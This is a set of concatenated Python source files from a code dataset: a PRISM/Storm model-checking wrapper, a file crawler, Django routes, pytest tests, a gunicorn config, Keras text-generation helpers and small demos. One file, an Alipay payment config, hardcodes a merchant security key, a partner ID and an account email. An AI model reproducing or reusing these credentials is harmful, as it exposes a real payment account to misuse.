output, silent, append=True)\n\n ## Check for errors\n ## 'OutOfMemoryError', \"Cannot allocate memory\", 'Type error', 'Syntax error', 'NullPointerException', 'use -noprobchecks'\n output = output.split(\"\\n\")\n for item in output:\n # print(item)\n 
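## Marker scan: \"use -noprobchecks\" means the outgoing transition\n ## probabilities did not sum to 1 (the caller retries with -noprobchecks);\n ## \"error\"/\"exception\"/\"Cannot allocate memory\" come back as (\"error\", msg).\n 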
if 'use -noprobchecks' in item:\n print(colored(f\"Outgoing transitions checksum error occurred\", \"red\"))\n return \"noprobchecks\", item.strip()\n if (\"error\" in item.lower()) or (\"Cannot allocate memory\" in item) or ('exception' in item.lower()):\n spam = item.strip()\n print(colored(spam, \"red\"))\n return \"error\", spam\n\n else:\n if not silent:\n print(\"calling \\\"\", \" \".join(args))\n output = subprocess.run(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT).stdout.decode(\"utf-8\")\n write_to_file(output_file_path, output, silent, append=False)\n\n ## Check for errors\n ## 'OutOfMemoryError', \"Cannot allocate memory\", 'Type error', 'Syntax error', 'NullPointerException', 'use -noprobchecks'\n output = output.split(\"\\n\")\n for item in output:\n # print(item)\n if 'use -noprobchecks' in item:\n print(colored(f\"Outgoing transitions checksum error occurred\", \"red\"))\n return \"noprobchecks\", item.strip()\n if (\"error\" in item.lower()) or (\"Cannot allocate memory\" in item) or ('exception' in item.lower()):\n spam = item.strip()\n print(colored(spam, \"red\"))\n return \"error\", spam\n return 0, \"\"\n finally:\n os.chdir(curr_dir)\n\n\n## TODO rewrite this without the paths, just files\ndef call_prism_files(model_prefix, agents_quantities, param_intervals=False, seq=False, noprobchecks=False, memory=\"\",\n model_path=model_path, properties_path=properties_path, property_file=False, output_path=prism_results, gui=False, silent=False):\n \"\"\" Calls prism for each file matching the prefix\n\n Args:\n model_prefix (string): file prefix to be matched\n agents_quantities (int): pop_sizes to be used\n param_intervals (list of pairs): list of intervals to be used for respective parameter (default all intervals are from 0 to 1)\n seq (bool): if true it will take properties one by one and append the results (helps to deal with memory)\n noprobchecks (bool): True if no noprobchecks option is to be used for prism\n model_path (string): path to load models from\n properties_path (string): path to load properties from\n param_intervals (list of pairs): parameter intervals\n property_file (string): file name of single property files to be used for all models\n output_path (string): path for the output\n memory (int): sets maximum memory in GB, see https://www.prismmodelchecker.org/manual/ConfiguringPRISM/OtherOptions\n gui (bool): callback function to be used\n silent (bool): if True the output is put to minimum\n \"\"\"\n # print(\"model_path \", model_path)\n # print(\"model_prefix \", model_prefix)\n # os.chdir(config.get(\"mandatory_paths\",\"cwd\"))\n if noprobchecks:\n noprobchecks = '-noprobchecks '\n else:\n noprobchecks = \"\"\n\n if memory == \"\":\n memory = \"\"\n elif \"javamaxmem\" not in str(memory):\n memory = f'-javamaxmem {memory}g '\n\n if not agents_quantities:\n # print(\"I was here\")\n agents_quantities = [\"\"]\n\n for N in sorted(agents_quantities):\n # print(\"glob.glob(os.path.join(model_path, model_prefix + str(N) + .pm))\", glob.glob(os.path.join(model_path, model_prefix + str(N) + \".pm\")))\n # print(\"glob.glob(os.path.join(model_path, model_prefix))\", glob.glob(os.path.join(model_path, model_prefix)))\n # print(\"model_prefix\", model_prefix)\n if \".\" in model_prefix:\n files = glob.glob(os.path.join(model_path, model_prefix))\n else:\n files = glob.glob(os.path.join(model_path, model_prefix + str(N) + \".pm\"))\n if not silent:\n print(\"input files: \", files)\n if not files:\n print(colored(\"No model files for N=\"+str(N)+\" 
found\", \"red\"))\n if gui:\n gui(1, \"Parameter synthesis\", \"No model files found.\")\n for file in files:\n file = Path(file)\n start_time = time()\n # print(\"{} seq={}{} >> {}\".format(file, seq, noprobchecks, str(prism_results)))\n\n ## Parsing the parameters from the files\n spam = parse_params_from_model(file, silent)\n params = \"\"\n i = 0\n for param in spam:\n if param_intervals:\n params = f\"{params}{param}={param_intervals[i][0]}:{param_intervals[i][1]},\"\n else:\n params = f\"{params}{param}=0:1,\"\n i = i + 1\n ## Getting rid of the last ,\n if params:\n params = params[:-1]\n\n ## OLD parameters\n # if multiparam:\n # params = \"\"\n # for i in range(1, N):\n # params = \"{},q{}=0:1\".format(q, i)\n # # q=q+\",q\"+str(i)\"=0:1\"\n # else:\n # params = \",q=0:1\"\n # error = call_prism(\"{} prop_{}.pctl {}{}-param p=0:1{}\".format(file, N, memory, noprobchecks, params),\n # seq=seq,\n # model_path=model_path, properties_path=properties_path, std_output_path=output_path)\n\n # print(\"{} prop_{}.pctl {}-param p=0:1{}\".format(file,N,noprobchecks,q))\n\n ## Calling the PRISM using our function\n\n if not property_file:\n error = call_prism(\"{} prop_{}.pctl {}{}-param {}\".format(file, N, memory, noprobchecks, params),\n seq=seq, model_path=model_path, properties_path=properties_path,\n std_output_path=output_path)\n else:\n # print(\"output_path\", output_path)\n # print(\"file\", file.stem)\n error = call_prism(\"{} {} {}{}-param {}\".format(file, property_file, memory, noprobchecks, params),\n seq=seq, model_path=model_path, properties_path=properties_path, std_output_path=output_path,\n std_output_file=\"{}_{}.txt\".format(str(file.stem).split(\".\")[0], str(Path(property_file).stem).split(\".\")[0]),\n silent=silent)\n\n # print(f\" Return code is: {error}\")\n if not silent:\n print(f\" It took {socket.gethostname()}, {time() - start_time} seconds to run\")\n\n ## Check for missing files\n if error[0] == 404:\n print(colored(error[1], \"red\"))\n if gui:\n gui(2, \"Parameter synthesis\", error[1])\n continue\n\n ## Check if memory problem has occurred\n if error[0] == \"memory\":\n if not seq:\n ## A memory occurred while not seq, trying seq now\n seq = True\n ## Remove the file because appending would no overwrite the file\n os.remove(os.path.join(output_path, \"{}.txt\".format(file.stem)))\n print(colored(\"A memory error occurred. Running prop by prob now\", \"red\"))\n if gui:\n gui(3, \"Parameter synthesis\", \"A memory error occurred. Running prop by prob now\")\n else:\n ## A memory occurred while seq\n ## Remove the file because appending would not overwrite the file\n os.remove(os.path.join(output_path, \"{}.txt\".format(file.stem)))\n memory = round(psutil.virtual_memory()[0] / 1024 / 1024 / 1024) ## total memory converted to GB\n if sys.platform.startswith(\"win\"):\n previous_memory = set_javaheap_win(f\"{memory}g\")\n print(colored(f\"A memory error occurred while seq, max memory increased to {memory}GB\", \"red\"))\n if gui:\n gui(3, \"Parameter synthesis\", f\"A memory error occurred while seq, max memory increased to {memory}GB\")\n\n if error[0] == \"memory_fail\":\n ## An error occurred even when seq and max memory, no reason to continue\n if gui:\n gui(1, \"Parameter synthesis\", f\"An error occurred even when seq and max memory\")\n break\n\n ## Check if there was problem with sum of probabilities\n if error[0] == \"noprobchecks\":\n if noprobchecks == \"\":\n print(colored(\"Outgoing transitions checksum error occurred. 
Running with noprobchecks option\", \"red\"))\n noprobchecks = '-noprobchecks '\n if gui:\n gui(3, \"Parameter synthesis\", \"Outgoing transitions checksum error occurred. Running with noprobchecks option\")\n else:\n print(colored(\"This is embarrassing, but an Outgoing transitions checksum error occurred even with the noprobchecks option\", \"red\"))\n if gui:\n gui(2, \"Parameter synthesis\", \"This is embarrassing, but an Outgoing transitions checksum error occurred even with the noprobchecks option\")\n\n ## Check for other errors\n if error[0] == \"error\":\n ## Check for NullPointerException\n if \"NullPointerException\" in error[1]:\n if seq:\n # print(colored(error[1], \"red\"))\n print(colored(\"Sorry, I do not know how to fix this, please try it manually\", \"red\"))\n print()\n if gui:\n gui(1, \"Parameter synthesis\", \"Sorry, I do not know how to fix this, please try it manually\")\n break\n else:\n print(colored(\"Trying to fix the null pointer exception by running prop by prop\", \"red\"))\n if gui:\n gui(3, \"Parameter synthesis\", \"Trying to fix the null pointer exception by running prop by prop\")\n seq = True\n ## Remove the file because appending would not overwrite the file\n os.remove(os.path.join(output_path, \"{}.txt\".format(file.stem)))\n elif ('OutOfMemoryError' in error[1]) or (\"Cannot allocate memory\" in error[1]):\n if not seq:\n seq = True\n else:\n print(colored(f\"A memory error occurred while seq, close some programs and try again with more memory\", \"red\"))\n if gui:\n gui(2, \"Parameter synthesis\", f\"A memory error occurred while seq, close some programs and try again with more memory\")\n elif \"Type error\" in error[1]:\n print(colored(\"A type error occurred, please check input files or manual\", \"red\"))\n if gui:\n gui(2, \"Parameter synthesis\", \"A type error occurred, please check input files or manual\")\n elif \"Syntax error\" in error[1]:\n print(colored(\"A syntax error occurred, please check input files or manual\", \"red\"))\n if gui:\n gui(2, \"Parameter synthesis\", \"A syntax error occurred, please check input files or manual\")\n else:\n print(\"Unrecognised error occurred:\")\n print(colored(error[1], \"red\"))\n if gui:\n gui(1, \"Parameter synthesis\", f\"Unrecognised error occurred: \\n {error[1]}\")\n continue\n\n if error[0] != 0:\n ## If an error occurred call this function for this file again\n print()\n # print(\"seq\",seq)\n # print(\"noprobchecks\", noprobchecks)\n call_prism_files(model_prefix, [N], seq=seq, noprobchecks=noprobchecks, memory=memory, model_path=model_path,\n properties_path=properties_path, property_file=property_file, output_path=prism_results)\n print()\n\n ## Setting the previous memory on windows\n if sys.platform.startswith(\"win\"):\n try:\n set_javaheap_win(previous_memory)\n except UnboundLocalError:\n pass\n\n\n## TODO rewrite this without the paths, just files\ndef call_storm(args, silent: bool = False, model_path=model_path, properties_path=properties_path,\n storm_output_path=storm_results, std_output_path=storm_results, std_output_file=False, time=False):\n \"\"\" Prints calls for storm model checking.\n\n Args:\n args (string): args for executing storm\n silent (bool): if silent command line output is set to minimum\n model_path (string): path to load models from\n properties_path (string): path to load properties from\n storm_output_path (string): path to save the files inside the command\n std_output_path (string): path to save the results of the command\n std_output_file (string): file name to save the 
output\n time (bool): if True time measurement is added\n \"\"\"\n # print(\"std_output_path\", std_output_path)\n # print(\"storm_results\", storm_results)\n # print(\"std_output_file\", std_output_file)\n\n if std_output_path is not None:\n output_file_path = Path(args.split()[0]).stem\n if not std_output_file:\n output_file_path = os.path.join(std_output_path, Path(str(output_file_path) + \".txt\"))\n else:\n output_file_path = os.path.join(storm_results, Path(str(std_output_file)))\n # print(\"new output_file_path\", output_file_path)\n else:\n output_file_path = \"\"\n\n # print(std_output_file)\n\n # os.chdir(config.get(\"mandatory_paths\",\"cwd\"))\n # print(os.getcwd())\n storm_args = []\n\n # print(args.split(\" \"))\n args = args.split(\" \")\n\n with open(output_file_path.split(\".\")[0]+\".cmd\", \"a+\") as command_file_path:\n # print(args)\n for arg in args:\n # print(arg)\n # print(re.compile('\\.[a-z]').search(arg))\n if re.compile('\\.pm').search(arg) is not None:\n model_file_path = os.path.join(model_path, arg)\n # print(model_file)\n if not os.path.isfile(model_file_path):\n command_file_path.write(f\"file {model_file_path} not found -- skipped \\n\")\n print(f\"{colored('file', 'red')} {model_file_path} {colored('not found -- skipped', 'red')}\")\n return 404\n storm_args.append(model_file_path)\n elif re.compile('\\.pctl').search(arg) is not None:\n property_file_path = os.path.join(properties_path, arg)\n # print(property_file)\n if not os.path.isfile(property_file_path):\n command_file_path.write(f\"file {property_file_path} not found -- skipped \\n\")\n print(f\"{colored('file', 'red')} {property_file_path} {colored('not found -- skipped', 'red')}\")\n return 404\n # storm_args.append(property_file_path)\n storm_args.append(\"my_super_cool_string\")\n elif re.compile('\\.txt').search(arg) is not None:\n command_file_path.write(f\"storm_output_path {storm_output_path} \\n\")\n print(\"storm_output_path\", storm_output_path)\n if not os.path.isabs(storm_output_path):\n storm_output_path = os.path.join(Path(storm_results), Path(storm_output_path))\n\n if not os.path.isdir(storm_output_path):\n if not silent:\n command_file_path.write(f\"The path {storm_output_path} not found, this may cause trouble \\n\")\n print(\n f\"{colored('The path', 'red')} {storm_output_path} {colored('not found, this may cause trouble', 'red')}\")\n\n storm_output_file_path = os.path.join(storm_output_path, arg)\n command_file_path.write(f\"storm_output_file_path {storm_output_file_path} \\n\")\n print(\"storm_output_file_path\", storm_output_file_path)\n storm_args.append(storm_output_file_path)\n else:\n storm_args.append(arg)\n\n args = [\"./storm-pars --prism\"]\n args.extend(storm_args)\n if time:\n args.append(\")\")\n if output_file_path is not \"\":\n args.append(\">>\")\n args.append(output_file_path)\n args.append(\"2>&1 \\n\")\n\n if time:\n spam = \"(time \"\n else:\n spam = \"\"\n for arg in args:\n spam = spam + \" \" + arg\n if time:\n spam = spam + \" \"\n\n with open(property_file_path, \"r\") as file:\n content = file.readlines()\n for line in content:\n # print(colored(line, \"blue\"))\n line = line.replace('\"', '\\\\\"')\n\n output = spam.replace(\"my_super_cool_string\", f\"--prop \\\"{line[:-1]}\\\"\")\n command_file_path.write(output)\n print(output)\n\n return True\n # output = subprocess.run(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT).stdout.decode(\"utf-8\")\n # write_to_file(std_output_path, output_file_path, output, silent, append=False)\n\n\n## TODO 
rewrite this without the paths, just files\ndef call_storm_files(model_prefix, agents_quantities, param_intervals=False, model_path=model_path, properties_path=properties_path, property_file=False, output_path=storm_results, time=False):\n \"\"\" Calls storm for each file matching the prefix\n\n Args:\n model_prefix: file prefix to be matched\n agents_quantities (int): pop_sizes to be used\n model_path (string): path to load models from\n param_intervals (list of pairs): list of intervals to be used for respective parameter (default all intervals are from 0 to 1)\n properties_path (string): path to load properties from\n property_file (string): file name of single property files to be used for all models\n output_path (string): path for the output\n time (bool): if True time measurement is added\n \"\"\"\n root = output_path\n\n # print(\"output_path \", output_path)\n # print(\"type(output_path) \", type(output_path))\n\n # print(\"model_prefix \", model_prefix)\n # print(\"type(model_prefix) \", type(model_prefix))\n\n # print(\"property_file \", property_file)\n # print(\"type(property_file) \", type(property_file))\n\n if not agents_quantities:\n # print(\"I was here\")\n agents_quantities = [\"\"]\n\n output_file = f\"{os.path.join(output_path, str(strftime('%d-%b-%Y-%H-%M-%S', localtime())+'.cmd'))}\"\n\n # print(output_file)\n with open(output_file, \"w\") as output_filee:\n output_filee.write(f\"cd /{root} \\n\")\n print(f\"cd /{root}\")\n\n output_filee.write(\"sudo docker pull movesrwth/storm:travis \\n\")\n print(\"sudo docker pull movesrwth/storm:travis\")\n output_filee.write(f'sudo docker run --mount type=bind,source=\"$(pwd)\",target=/{root} -w /opt/storm/build/bin --rm -it --name storm movesrwth/storm:travis \\n')\n print(f'sudo docker run --mount type=bind,source=\"$(pwd)\",target=/{root} -w /opt/storm/build/bin --rm -it --name storm movesrwth/storm:travis')\n\n # print(\"model_path\", model_path)\n # print(\"model_prefix\", model_prefix)\n for N in sorted(agents_quantities):\n if \".\" in model_prefix:\n files = glob.glob(os.path.join(model_path, model_prefix))\n else:\n files = glob.glob(os.path.join(model_path, model_prefix + str(N) + \".pm\"))\n # print(\"files\", files)\n if not files:\n with open(output_file, \"w\") as output_filee:\n output_filee.write(\"No model files for N=\"+str(N)+\" found\")\n print(colored(\"No model files for N=\"+str(N)+\" found\", \"red\"))\n continue\n for file in files:\n file = Path(file)\n # print(\"{} {}\".format(file, property_file))\n # call_storm(\"{} {}\".format(file, property_file), model_path=model_path, properties_path=properties_path, std_output_path=output_path, std_output_file=\"{}_{}.txt\".format(str(file.stem).split(\".\")[0], property_file.split(\".\")[0]), time=time)\n\n if property_file:\n # print(\"property_file\", property_file)\n # print(\"file\", file)\n # print(\"file stem\", file.resolve().stem)\n # print(\"{}_{}.txt\".format(str(file.stem).split(\".\")[0], property_file.split(\".\")[0]))\n call_storm(\"{} {}\".format(file, property_file), model_path=model_path, properties_path=properties_path, std_output_path=output_path, std_output_file=output_file)\n else:\n call_storm(\"{} prop_{}.pctl\".format(file, N), model_path=model_path, properties_path=properties_path, std_output_path=output_path, std_output_file=output_file)\n","sub_path":"src/mc.py","file_name":"mc.py","file_ext":"py","file_size_in_byte":31489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} 
+{"seq_id":"231751323","text":"import argparse\nfrom FileOperations import FileOperations as FO\nfrom Crawler import Crawler\nimport os.path\n\nparser = argparse.ArgumentParser(description='Crawl file and execute regex rules on them')\nparser.add_argument('-p', metavar='ParameterFilePath', type=argparse.FileType('r'), required=True,\n help=\"path to a parameter json file. Parameter file should contain a 'crawling', 'rules' and 'result' key\")\nparser.add_argument('-o', metavar='OutputFilePath', type=argparse.FileType('w+'), help='output file. This argument is required if no output is specified in parameter file.\\n The file must be either a .csv or .json')\nparser.add_argument('-mt', metavar='Thread Numbers', type=int, help='have a multi-threaded cralwer (1 thread per file) and precise the number of concurrent thread')\nparser.add_argument('-s', metavar='StartDirectory', type=str, help='directory in which the crawling will start. This parameter is necessary if there is no \"crawling\" dictionary in the parameter file')\n\nargs = parser.parse_args()\nif \"p\" not in args or args.p is None:\n parser.error(parser.format_usage())\nparam = FO.get_from_JSON_file(args.p.name)\nif \"rules\" not in param or (\"o\" not in args and \"output\" not in param):\n print(\"rules error\")\n parser.error(parser.format_usage())\nif \"crawling\" not in param and (\"s\" not in args or args.s is None):\n parser.error(parser.format_usage())\nelif \"s\" in args and args.s is not None:\n param[\"crawling\"] = { \"start\": args.s}\nif \"o\" in args and args.o is not None:\n output_name, output_extension = os.path.splitext(args.o.name)\n param[\"output\"] = {\n \"path\": args.o.name,\n \"type\": \"csv\" if \".csv\" in output_extension else \"json\"\n }\nif \"mt\" in args and args.mt is not None:\n Crawler.crawl_multithread(param.get(\"crawling\"), param.get(\"rules\"), param.get(\"result\"), param[\"output\"], args.mt)\nelse:\n Crawler.crawl(param.get(\"crawling\"), param.get(\"rules\"), param.get(\"result\"), param[\"output\"])","sub_path":"filecrawler.py","file_name":"filecrawler.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"496602903","text":"from django.conf.urls import url, include\nfrom django.contrib import admin\n\nfrom . 
import views\n\nadmin.autodiscover()\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'index$', views.index, name='index'),\n url(r'generate$', views.generate, name='generate'),\n url('^admin/', include(admin.site.urls)),\n\n\n #requete fait en ajax pour obtenir des informations de facon dynamique\n url(r'getExempleByTypeDonnees$', views.getExempleByTypeDonnees),\n url(r'getTypeDonnees$', views.getTypeDonnees),\n]\n","sub_path":"generateData/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"61002518","text":"import numpy as np\nimport pytest\n\nfrom sdia_python.lab2.unit_box_window import UnitBoxWindow\n\n\ndef test_raise_type_error_when_something_is_called():\n with pytest.raises(TypeError):\n # call_something_that_raises_TypeError()\n raise TypeError()\n\n\n@pytest.mark.parametrize(\n \"center, expected\",\n [\n (np.array([2.5]), \"BoxWindow: [2.0, 3.0]\"),\n (\n np.array([0.5, 1, 2, 4]),\n \"BoxWindow: [0.0, 1.0] x [0.5, 1.5] x [1.5, 2.5] x [3.5, 4.5]\",\n ),\n (np.array([1, 10, 2]), \"BoxWindow: [0.5, 1.5] x [9.5, 10.5] x [1.5, 2.5]\",),\n ],\n)\ndef test_box_string_representation(center, expected):\n assert (UnitBoxWindow(center)).__str__() == expected\n\n\n@pytest.fixture\ndef box_2d_05():\n return UnitBoxWindow(np.array([[0, 5], [0, 5]]))\n\n\n@pytest.mark.parametrize(\n \"point, expected\",\n [\n (np.array([0, 0]), True),\n (np.array([2.5, 2.5]), True),\n (np.array([-1, 5]), False),\n (np.array([10, 3]), False),\n ],\n)\ndef test_indicator_function_box_2d(box_2d_05, point, expected):\n is_in = box_2d_05.indicator_function(point)\n assert is_in == expected\n\n\n#######################################test center##############################\n@pytest.mark.parametrize(\n \"bounds, expected\",\n [\n (np.array([[0, 0]]), np.array([0])),\n (np.array([[2.5, 2.5]]), np.array([2.5])),\n (np.array([[1, 3], [5, 7]]), np.array([2, 6])),\n (np.array([[1, 3], [5, 7], [10, 20]]), np.array([2, 6, 15])),\n ],\n)\ndef test_center(bounds, expected):\n box = UnitBoxWindow(bounds)\n assert np.array_equal(box.center(), expected)\n\n\n######################################test rand#################################\ndef all_in(box, n):\n flag = True\n for i in range(n):\n flag = box.indicator_function(box.rand(n)[i])\n\n return flag\n\n\n@pytest.mark.parametrize(\n \"bounds,n,expected\",\n [\n (np.array([[1, 2]]), 1, True),\n (np.array([[1, 2], [1, 2]]), 2, True),\n (np.array([[1, 2], [100, 101]]), 3, True),\n (np.array([[1, 2], [4, 4]]), 4, True),\n ],\n)\ndef test_rand_points_in_box(bounds, n, expected):\n box = UnitBoxWindow(bounds)\n assert all_in(box, n) == expected\n\n\n#######################################test volume##############################\n@pytest.mark.parametrize(\n \"bounds, expected\",\n [\n (np.array([[0, 0]]), 0),\n (np.array([[2.5, 2.5]]), 0),\n (np.array([[1, 3], [5, 7]]), 4),\n (np.array([[1, 3], [5, 7], [10, 20]]), 40),\n ],\n)\ndef test_volume(bounds, expected):\n box = UnitBoxWindow(bounds)\n assert np.array_equal(box.volume(), expected)\n","sub_path":"tests/lab2/test_unit_box_window.py","file_name":"test_unit_box_window.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"153148967","text":"import os\nimport multiprocessing\n\n# _ROOT = os.path.abspath(os.path.join(\n# os.path.dirname(__file__), '..'))\n# _VAR = os.path.join(_ROOT, 
'var')\n# _ETC = os.path.join(_ROOT, 'etc')\n\nloglevel = 'info'\n# errorlog = os.path.join(_VAR, 'log/api-error.log')\n# accesslog = os.path.join(_VAR, 'log/api-access.log')\nerrorlog = \"-\"\naccesslog = \"-\"\n\nflask_host = os.getenv('FLASK_HOST', '127.0.0.1')\nflask_port = os.getenv('FLASK_PORT', 8080)\n\n# bind = 'unix:%s' % os.path.join(_VAR, 'run/gunicorn.sock')\nbind = f'{flask_host}:{flask_port}'\n\n# Environment variables are strings, so bool() of any non-empty value would be\n# True; compare against the usual truthy spellings instead.\nif os.getenv('DEBUG', '').lower() in ('1', 'true', 'yes'):\n workers = 1\nelse:\n workers = multiprocessing.cpu_count() * 2 + 1\n\ntimeout = 3 * 60 # 3 minutes\nkeepalive = 24 * 60 * 60 # 1 day\n\ncapture_output = True\n","sub_path":"gunicorn.conf.py","file_name":"gunicorn.conf.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"12991428","text":"# -*- coding:utf-8 -*-\nfrom chaolifeProject.settings import TEST\nif TEST:\n BASE_URL = 'http://test.supreamtimes.com/api'\nelse:\n BASE_URL = 'http://www.supreamtimes.com/api'\n\nclass Alipaysettings:\n # Security check code: a 32-character string of digits and letters\n ALIPAY_KEY = '200x3jvph6945seg5ylfg1xc4zhw32z1'\n\n ALIPAY_INPUT_CHARSET = 'utf-8'\n\n # Partner ID: 16 digits starting with 2088\n ALIPAY_PARTNER = '2088421443875084'\n\n # Contracted Alipay account (the seller's Alipay account)\n ALIPAY_SELLER_EMAIL = 'chaomengshidai@agesd.com'\n\n ALIPAY_SIGN_TYPE = 'RSA'\n\n # Page to redirect to after payment (synchronous notification); must be a full\n # http:// URL without custom parameters such as ?id=123\n ALIPAY_RETURN_URL = ''\n\n # Page the server notifies asynchronously during the transaction; must be a full\n # http:// URL without custom parameters such as ?id=123\n if TEST:\n ALIPAY_NOTIFY_URL = 'http://test.supreamtimes.com/api/pay/alipay/callback/'\n else:\n ALIPAY_NOTIFY_URL = 'http://www.supreamtimes.com/api/pay/alipay/callback/'","sub_path":"chaolife/pay/views/pay/payconfig.py","file_name":"payconfig.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"320155138","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom keras.models import Sequential, load_model\nfrom keras.layers import Dense, Activation, LSTM, TimeDistributed\nfrom keras import optimizers\nimport numpy as np\nimport h5py\nimport pickle\n\"\"\"\nnum = input('Which model would you like to use? (1 for lotr, 2 for char recipe, 3 for word recipe, 4 for poetry): ')\nmodel = None\npickl = None\nfile_name = None\n\nprint(num)\n\n# file_name is included at this point just in case... 
you know?\nif num == 1:\n model = load_model('./models/tolkienmodel230.h5')\n file_name = './corpi/TolkiensMiddleEarth.txt'\n pickl = './pickles/lotr_pickle.p'\nelif num == 2:\n model = load_model('./models/char_recipe_model190.h5')\n file_name = './corpi/parsed_text.txt'\n pickl = './pickles/char_recipe_parsed_pickle.p'\nelif num == 3:\n model = load_model('./models/KENNETHSMODEL')\n file_name = './corpi/all_files.txt'\n pickl = './pickles/word_mappings.p'\nelif num == 4:\n model = load_model('./models/poemmodel100.h5')\n file_name = './corpi/poem_corpusv2.txt'\n pickl = './pickles/poem_pickev2.p'\n\n# data = open(file_name, 'r').read() --> Don't need this (yet?)\n# data = data.lower()\n# data = list(data.rstrip())\n# chars = list(set(data))\n\"\"\"\n# Arguments: (model, name of pickle file, length of sample)\ndef generate_with_seed(seed, model, picklename, length):\n # LOAD THE PICKLE\n with open(picklename, 'rb') as handle:\n [ix_to_char, char_to_ix] = pickle.load(handle)\n\n VOCAB_SIZE = len(ix_to_char)\n\n print(\"\\n\")\n\n ix = [char_to_ix[seed[-1]]]\n y_char = [ix_to_char[ix[-1]]]\n X = np.zeros((1, length, VOCAB_SIZE))\n # one-hot encode the seed characters into the input tensor\n for t, char in enumerate(seed):\n X[0, t, :][char_to_ix[char]] = 1\n\n for i in range(length):\n X[0, i, :][ix[-1]] = 1\n print(ix_to_char[ix[-1]], end=\"\")\n ix = np.argmax(model.predict(X[:, :i+1, :])[0], 1)\n y_char.append(ix_to_char[ix[-1]])\n return ('').join(y_char)\n\"\"\"\nprint(\"\\n\")\ngenerate_with_seed(model, pickl, 500)\nprint(\"\\n\")\n\"\"\"\n\ndef generate_with_seed_word(seed, model, picklename, length):\n # with open(picklename, 'rb') as handle:\n # [ix_to_char, char_to_ix] = pickle.load(handle)\n #\n # VOCAB_SIZE = len(ix_to_char)\n # # seed = input(\"enter seed text: \")\n # # print(\"\\n\")\n #\n # ix = [char_to_ix[seed[-1]]]\n # y_char = [ix_to_char[ix[-1]]]\n # X = np.zeros((1, length, VOCAB_SIZE))\n #\n # # for t, char in enumerate(seed):\n # # X[0, t, :][char_to_ix[char]] = 1\n # X[0][char_to_ix[seed]] = 1\n #\n # for i in range(length):\n # X[0,i,:][ix[-1]] = 1\n # print(ix_to_char[ix[-1]], end=\" \")\n # ix = np.argmax(model.predict(X[:, :i+1, :])[0], 1)\n # y_char.append(ix_to_char[ix[-1]])\n # return ('').join(y_char)\n\n\n with open(picklename, 'rb') as handle:\n [ix_to_char, char_to_ix] = pickle.load(handle)\n\n VOCAB_SIZE = len(ix_to_char)\n #seed = input(\"enter seed text: \")\n print(\"\\n\")\n\n ix = [np.random.randint(VOCAB_SIZE)]\n y_char = [ix_to_char[ix[-1]]]\n X = np.zeros((1, length, VOCAB_SIZE))\n\n for i in range(length):\n X[0,i,:][ix[-1]] = 1\n print(ix_to_char[ix[-1]], end=\" \")\n ix = np.argmax(model.predict(X[:, :i+1, :])[0], 1)\n y_char.append(ix_to_char[ix[-1]])\n return ('').join(y_char)\n\n\n# def generate_text_word(model, length):\n# ix = [np.random.randint(VOCAB_SIZE)]\n# y_char = [ix_to_char[ix[-1]]]\n# X = np.zeros((1, length, VOCAB_SIZE))\n# for i in range(length):\n# X[0, i, :][ix[-1]] = 1\n# print(ix_to_char[ix[-1]], end=\" \")\n# ix = np.argmax(model.predict(X[:, :i+1, :])[0], 1)\n# y_char.append(ix_to_char[ix[-1]])\n# return ('').join(y_char)\n","sub_path":"IE3_WebApp/app/generate_sample.py","file_name":"generate_sample.py","file_ext":"py","file_size_in_byte":3794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"81405773","text":"'''\nCreated on 08-Jun-2019\n\n@author: ramya.n\n'''\nfrom selenium import webdriver\nfrom time import sleep\n
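# Setting dom.webnotifications.enabled to False suppresses the browser's\n# web-notification permission prompts for every page loaded in this session.\nprofile = 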
webdriver.FirefoxProfile()\nprofile.set_preference(\"dom.webnotifications.enabled\",False)\ndriver = webdriver.Firefox(profile)\ndriver.implicitly_wait(10)\ndriver.get(\"https://www.cleartrip.com/\")\nsleep(6)\ndriver.quit()","sub_path":"Selenium/Selenium/Popups/DisableNotificationpopupFirefox.py","file_name":"DisableNotificationpopupFirefox.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"79092800","text":"# str\n\nstr1 = 'Codekul - The Gurukul for Coders!'\nres = len(str1)\n\nstr2 = \"Python Batch\"\nstr3 = str1 + str2\n\nstr4 = str1.replace(\" \", \"_\")\nprint(str4)\n\n# List\n\nlist1 = [1,2,3,4,5,'Seven', 8.9, True]\n\nlist1.append(6)\n\nlist2 = [2,3,4]\n\nlist3 = list1 + list2\nlist3[2] = 30\nlist3.remove('Seven')\nprint(list3)\n\n# dictionary\n\ndict1 = {'key1': 'value1', 'key2': 'value2', 'abc': 123, 1: 'One'}\ndict1['Two'] = 2\n# print(dict1[2])\n\n# tuple\n\nt1 = (1,2,3,4, 'Five', 6.7, True)\n\nprint(t1[0])","sub_path":"collectionsDemo.py","file_name":"collectionsDemo.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"331360479","text":"\"\"\"\n config file that declare logging system\n and its handling to Fluend log system.\n Gives logging object as 'LOG' to call needed log method, ex:\n \"Critical, ERROR, WARNING, INFO, DEBUG, NOTSET\"\n\"\"\"\n\nimport logging\nfrom fluent import handler\n\nHOST = 'localhost' #'heatmaptraining_fluentd_1'\nPORT = 24224\nLOGGING_LEVEL = logging.DEBUG\n\n\n# format for data that saves into general log file via Fluentd.\nCUSTOM_FORMAT = {\n 'host': '%(hostname)s',\n 